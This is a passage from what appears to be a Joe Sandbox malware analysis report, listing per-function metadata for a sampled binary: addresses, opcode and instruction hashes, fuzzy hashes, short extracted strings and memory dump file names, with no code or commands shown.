                                    • Opcode ID: 14a7e0b747886da39886007e84fc6362e9af7b1f05ada66e2383b559549b66f5
                                    • Instruction ID: 712506107e73a000bfc57521f666ae5649f4e35fd07735246258363bcf88efd3
                                    • Opcode Fuzzy Hash: 14a7e0b747886da39886007e84fc6362e9af7b1f05ada66e2383b559549b66f5
                                    • Instruction Fuzzy Hash: 3811843180411D9BDB14EBA1DC65AED7378BF90301F4047A9A91A57492EF302B4ECB9A
                                    Function 00CD686F Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: g@
                                    • API String ID: 0-50332989
                                    • Opcode ID: d016fb41ec036f5d9b781ea675a5074cf079cde8d3a706418cb9cd82db258366
                                    • Instruction ID: d9d753c1f2a0ddfdcca7dc8d55f647a8d0d34c1dba49725be3b0c4c38fc995ab
                                    • Opcode Fuzzy Hash: d016fb41ec036f5d9b781ea675a5074cf079cde8d3a706418cb9cd82db258366
                                    • Instruction Fuzzy Hash: 62716BF3A182049BF3046E7DDC9577BB7D9DB94320F2A863DE5C4C7780E97998058682
                                    Function 00BB5C61 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: F)sP
                                    • API String ID: 0-3353271891
                                    • Opcode ID: 50c3ab21e40f4c9e3bdf786f95b556d92024c3c4b066f74e40d5099bdb003753
                                    • Instruction ID: 1f267eaf8b94f9bc85561d7ebedef456517f97308b480a2db50bf8940e1de98d
                                    • Opcode Fuzzy Hash: 50c3ab21e40f4c9e3bdf786f95b556d92024c3c4b066f74e40d5099bdb003753
                                    • Instruction Fuzzy Hash: 38712BF39082049FF300AE2DEC8576BFBE5EB94720F16863DEAC483744E97599158692
                                    Function 00C8007B Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: b{\{
                                    • API String ID: 0-957799881
                                    • Opcode ID: ac601e3126c8531f5bb03b8afafcd50e93fbee34d88bb4e5d8622ab0f6594c71
                                    • Instruction ID: 3befccebecf51832115b8e6e323d44f493415c891386e6b88261b0497cebf1eb
                                    • Opcode Fuzzy Hash: ac601e3126c8531f5bb03b8afafcd50e93fbee34d88bb4e5d8622ab0f6594c71
                                    • Instruction Fuzzy Hash: 7A6132F3A087149BE3106E2EDCC17BAF7D9EF54360F1A463DDA8883784E57A5C008696
                                    Function 00C2056B Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ZF~
                                    • API String ID: 0-4056117244
                                    • Opcode ID: f6f861f8542f1152bb97c9edebf50c273f8678cd845a431479f81cf65e330c81
                                    • Instruction ID: 3e93c7f15a3e95973bbaaf4ce5f7f72eaab7775605fbac30a986ca02b54c9504
                                    • Opcode Fuzzy Hash: f6f861f8542f1152bb97c9edebf50c273f8678cd845a431479f81cf65e330c81
                                    • Instruction Fuzzy Hash: 024156F3E583044BE3046E78ECC47AAB7D9EB98320F2A463DDBD483780F57959004296
                                    Function 00C1270D Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ;}~
                                    • API String ID: 0-2029327934
                                    • Opcode ID: fe2847a27ddfd7f3c6a0db07a8fc0eda97ed6cc586afdce84b395b730e00a379
                                    • Instruction ID: 8a8b265a97665167dfa0b7f0cab8552202c5329dc158a184b79ba76e25fee0c3
                                    • Opcode Fuzzy Hash: fe2847a27ddfd7f3c6a0db07a8fc0eda97ed6cc586afdce84b395b730e00a379
                                    • Instruction Fuzzy Hash: 8841F4F3B192045BF3585E29EC817A6B7DAE794320F1B063DEA98C33C0ED799C054695
                                    Function 00BC77A9 Relevance: .2, Instructions: 246COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 153366ee114a8fd93d4bd22578e6fdc95b56d5ea6baec351a6b55561b12230a7
                                    • Instruction ID: 485a53d209a9f614713fc5a250acf0634bb164aad832e749627c76a8249d2592
                                    • Opcode Fuzzy Hash: 153366ee114a8fd93d4bd22578e6fdc95b56d5ea6baec351a6b55561b12230a7
                                    • Instruction Fuzzy Hash: AB7119F3A086145FE3106E2EDC4876ABBD6DBD4320F17463DDBD8D3784EA3598028686
                                    Function 00CD2642 Relevance: .2, Instructions: 167COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1cee8aff3ba7746c14c8dfd7defafaa4ebaeba97d6461f2db1a5d284e7368c4a
                                    • Instruction ID: bf22d107ed38ec115cb3a215406392fe323a6aa13dba36a40ce6090c61332c8c
                                    • Opcode Fuzzy Hash: 1cee8aff3ba7746c14c8dfd7defafaa4ebaeba97d6461f2db1a5d284e7368c4a
                                    • Instruction Fuzzy Hash: E25123B3A087049FE3046E28DC8627AF7E9EF90320F1B493DD6C4C3740E97598448682
                                    Function 00BFB5DF Relevance: .1, Instructions: 133COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3169f6aff43da90403c280d5849e732f79bac7772d7662618f5e89012854c937
                                    • Instruction ID: 1a71afd83234aa2beadc29286865b0905d38c1cdffbeb651ea1d1f092513162f
                                    • Opcode Fuzzy Hash: 3169f6aff43da90403c280d5849e732f79bac7772d7662618f5e89012854c937
                                    • Instruction Fuzzy Hash: FD4155B2A1C3049BD3587F28EC9567AFBE5EF94710F17082DE6C587680EA3555808B8B
                                    Function 00C5141F Relevance: .1, Instructions: 124COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0e6e7a1f5d0961037e53ac3c4ba285bf903558a05a118aa4be9649cfc65ec22e
                                    • Instruction ID: a615cb5c943845ab5b50a3149e6469dcd6b79a79b8be40e467e7f4c36f0624c9
                                    • Opcode Fuzzy Hash: 0e6e7a1f5d0961037e53ac3c4ba285bf903558a05a118aa4be9649cfc65ec22e
                                    • Instruction Fuzzy Hash: 433115F3B086008FF754EE2DDC8576AB6D2EBC4310F1A893DD689D3B84E93958058696
                                    Function 00BF3E99 Relevance: .1, Instructions: 120COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 700c0f88ba818fecbca96f4398f64b6b845ee3fc5dda25a213d2e3fb5bfc3082
                                    • Instruction ID: 11fbc3b5fd542bf4cb4b25ab1f01a1c40b108cf5ca526fe134af6cb3e9ea8cdb
                                    • Opcode Fuzzy Hash: 700c0f88ba818fecbca96f4398f64b6b845ee3fc5dda25a213d2e3fb5bfc3082
                                    • Instruction Fuzzy Hash: 493129F3E043215BE3149979ED5477BB2D9DB90320F2B463DDA84A7384E97D4D0182C6
                                    Function 00CE2980 Relevance: .1, Instructions: 116COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b1e01cccabf90ff75de48ae5453fdd8bf32f0be7626261f6cabdef9b5d064a25
                                    • Instruction ID: 401455bdf5e2351a294c19c349c5ab20243b3b163846df79d1c313c8656d0139
                                    • Opcode Fuzzy Hash: b1e01cccabf90ff75de48ae5453fdd8bf32f0be7626261f6cabdef9b5d064a25
                                    • Instruction Fuzzy Hash: FC315CB3B093041BE314592FEC4572BB39ADBD0734F1BC63EDA4587785ED79680A4291
                                    Function 00CBCD12 Relevance: .1, Instructions: 109COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7ff6479d516b0f3b56fc0cff9f0a20725039ceb522d483d64d030d9893ff3476
                                    • Instruction ID: 7e8e220e287d1e21ed41df89134f67031e2100a51e739d28884a2907d43619d4
